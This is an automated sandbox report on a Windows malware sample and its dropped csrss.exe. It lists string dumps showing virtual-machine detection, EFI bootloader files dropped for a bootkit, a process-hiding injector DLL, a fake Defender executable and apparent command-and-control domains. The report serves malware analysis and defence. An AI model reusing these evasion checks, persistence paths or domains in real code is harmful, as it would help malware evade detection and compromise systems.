RVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVPC-S3VPCUHUB$
            Source: csrss.exeBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)Jump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Windows\windefender.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
            Source: C:\Windows\rss\csrss.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile opened / queried: VBoxGuestJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile opened / queried: vmciJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile opened / queried: HGFSJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile opened / queried: VBoxTrayIPCJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: csrss.exeBinary or memory string: derivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousev
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332838635.00000000160FE000.00000004.00000001.sdmpBinary or memory string: svchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exedllhost.exesvchost.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.execonhost.exeUsoClient.exeusoclient.exeUsoClient.exeusoclient.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesgrmbroker.exesvchost.exe1dyvcthqv1.exexennet$
            Source: csrss.exeBinary or memory string: ayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmpBinary or memory string: vmusrvc.exe
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
            Source: csrss.exeBinary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmpBinary or memory string: qemuvirtual
            Source: csrss.exeBinary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
            Source: csrss.exeBinary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
            Source: csrss.exeBinary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
            Source: csrss.exeBinary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
            Source: csrss.exeBinary or memory string: licesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DYOR-
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332838635.00000000160FE000.00000004.00000001.sdmpBinary or memory string: xennet6xensvcxenvdb
            Source: csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmpBinary or memory string: 11VBoxSFVT(%d)WINDIRWib
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmpBinary or memory string: systemvboxtray.exe
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: vmxnet[system process]vmsrvc.exevmusrvc.exeSystemsystemvmsrvc.exevmusrvc.exeRegistryregistry
            Source: csrss.exeBinary or memory string: verenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value>
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: smss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exedwm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesearchui.exesvchost.exeHxTsr.exehxtsr.exedllhost.exesvchost.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exeWmiPrvSE.exewmiprvse.exesvchost.exesvchost.exesvchost.exesvchost.exesgrmbroker.exesvchost.exe1dyvcthqv1.exevmci$
            Source: csrss.exeBinary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
            Source: csrss.exeBinary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: RegCreateKeyExWRegCloseKeysvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exespoolsv.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exedllhost.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exevboxtray.exevboxservice.exesvchost.exevboxtray.exevboxservice.exeCreateFileW
            Source: csrss.exeBinary or memory string: main.isRunningInsideVMWare
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: vmmousevmusb$
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332691584.00000000160D8000.00000004.00000001.sdmpBinary or memory string: SELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProHKEY_USERS\ardz\Desktop\1dyvctHqv1.exe" "C:\Users\user\Desktop\1dyvctHqv1.exe" S-1-5-21-3853321935-2125563209-4053062332-1002svchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.exe\\.\VBoxMiniRdrDN\\.\pipe\VBoxMiniRdDN\\.\pipe\VBoxTrayIPCcsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exeSearchUI.exesvchost.exeHxTsr.exedllhost.exesvchost.exeWmiPrvSE.exeWmiPrvSE.exeWmiPrvSE.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exectfmon.exeexplorer.exesvchost.exedllhost.exesvchost.execonhost.exesvchost.exesvchost.exedllhost.exesvchost.exesvchost.exesvchost.execsrss.exewininit.execsrss.exesvchost.exesvchost.exesvchost.exe
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmpBinary or memory string: vmsrvc.exe
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: vboxservice.exe
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsnowflakesparklingsucceededtask %+v
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332227986.0000000016052000.00000004.00000001.sdmpBinary or memory string: wtsapi32.dllWTSQuerySessionInformationWuseradvapi32.dllLookupAccountNameWcomputerConvertSidToStringSidWkernel32.dllGetModuleFileNameWC:\Users\user\DesktopSetCurrentDirectoryWole32.dllRegQueryValueExWFirewallDefenderhttps://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicrosoft Windows 10 ProOSArchitecturePatchTimeB3SR64GYOpenProcessTokenGetTokenInformationS-1-5-18c:\windows\rss\csrss.exeCreateToolhelp32Snapshot[System Process]SystemRegistrysmss.exefontdrvhost.exefontdrvhost.exedwm.exeMemory Compressionmemory compressionShellExperienceHost.exeshellexperiencehost.exeRuntimeBroker.exeruntimebroker.exesmartscreen.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeRuntimeBroker.exeruntimebroker.exeSystemSettingsBroker.exesystemsettingsbroker.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exeSgrmBroker.exeTrustedInstaller.exetrustedinstaller.exe1dyvctHqv1.exeVBoxWddmCloseServiceHandleVBoxMouseVBoxGuestvgauthservice.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exeJvTfUqDXCojHUynhhabZXuM.exejvtfuqdxcojhuynhhabzxum.exevgauthservice.exevgauthservice.exevgauthservice.
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: vboxtray.exe
            Source: csrss.exeBinary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
